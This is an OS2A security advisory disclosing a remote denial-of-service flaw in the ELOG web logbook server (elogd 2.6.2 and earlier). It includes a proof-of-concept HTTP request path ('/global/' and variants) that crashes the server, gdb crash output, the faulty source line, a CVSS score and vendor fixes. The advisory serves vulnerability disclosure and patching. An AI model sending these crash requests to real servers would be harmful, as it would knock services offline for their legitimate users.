ELOG Web Logbook Remote Denial of Service Vulnerability OS2A ID: OS2A_1008 Status: 10/31/2006 Issue Discovered 11/08/2006 Reported to the Vendor 11/08/2006 Fixed by Vendor 11/10/2006 Advisory Released Class: Denial of Service Severity: Medium Overview: --------- The Electronic Logbook (ELOG) is part of a family of applications known as weblogs. ELOG is a remarkable implementation of a weblog in its simplicity of use and versatility. http://midas.psi.ch/elog/index.html Description: ------------ Remote exploitation of a denial of service vulnerability in ELOG's elogd server allows attackers to crash the service, thereby preventing legitimate access. The [global] section in configuration file elogd.cfg is used for settings common to all logbooks. The vulnerability is due to improper handling of an HTTP GET request if logbook name 'global' (or any logbook name prefixed with global) is used in the request. When such a request is received, a NULL pointer dereference occurs, leading to a crash of the service. Only authenticated users can exploit this vulnerability if the application is configured with password. Impact: ------- Successful exploitation allows a remote attacker to crash the elogd server. Affected Software(s): --------------------- ELOG 2.6.2 (SVN revision 1748) and prior. Debian package elog 2.6.2+r1719-1 and prior are also vulnerable. Proof of Concept: ----------------- The HTTP GET request given below is sufficient to crash affected server: http://www.example.com/global/ or Create a logbook [global_xxx] or [global xxx] in elogd.cfg and try to access it using a browser. http://www.example.com/global_xxx/ http://www.example.com/global%20xxx/ Analysis: ----------- #gdb ./elogd ... ... (gdb) break show_elog_list Breakpoint 2 at 0x809d6e0 (gdb) c Continuing. (no debugging symbols found) elogd 2.6.2 built Nov 8 2006, 01:25:48 revision 1699 Falling back to default group "elog" Falling back to default user "elog" Indexing logbooks ... done Server listening on port 8080 ... Breakpoint 2, 0x0809d6e0 in show_elog_list () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0809eb7a in show_elog_list () (gdb) bt #0 0x0809eb7a in show_elog_list () #1 0x00000000 in ?? () (gdb) i r eax 0x0 0 ecx 0x9d43d88 164904328 edx 0x0 0 ebx 0x0 0 esp 0xbfa8aca0 0xbfa8aca0 ebp 0x80df40c 0x80df40c esi 0xbfb27050 -1078824880 edi 0x0 0 eip 0x809eb7a 0x809eb7a eflags 0x200246 2097734 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/i $eip 0x809eb7a : mov (%eax),%eax The vulnerable code is at Line:16774 of elogd.c, n_msg = *lbs->n_el_index; where the pointer lbs is dereferenced before being null checked. --- elogd.c, show_elog_list() ----- } else { n_logbook = 1; n_msg = *lbs->n_el_index; } msg_list = xmalloc(sizeof(MSG_LIST) * n_msg); ---elogd.c, show_elog_list() ----- CVSS Score Report: ----------------- ACCESS_VECTOR = REMOTE ACCESS_COMPLEXITY = LOW AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT = COMPLETE IMPACT_BIAS = AVAILABILITY EXPLOITABILITY = FUNCTIONAL REMEDIATION_LEVEL = OFFICIAL_FIX REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 5.0 (AV:R/AC:L/Au:NR/C:N/I:N/A:C/B:A) CVSS Temporal Score = 4.1 Risk factor = Medium Vendor Response: --------------- Vendor has acknowledged the vulnerability and released a fixed version, ELOG version 2.6.2-7 (SVN revision 1749). http://savannah.psi.ch/websvn/log.php?repname=elog&path=%2Ftrunk%2F&rev=0&sc=0&isdir=1 (Revisions 1746-1749) Debian has fixed this issue in elog_2.6.2+r1754-1, http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397875 Solution: --------- Install the fixed version, ELOG version 2.6.2-7 (SVN revision 1749) or later. http://midas.psi.ch/elog/download.html For debian, update to elog_2.6.2+r1754-1 or later. Credits: ------- Jayesh KS and Arun Kethipelly of OS2A have been credited with the discovery and analysis of this vulnerability.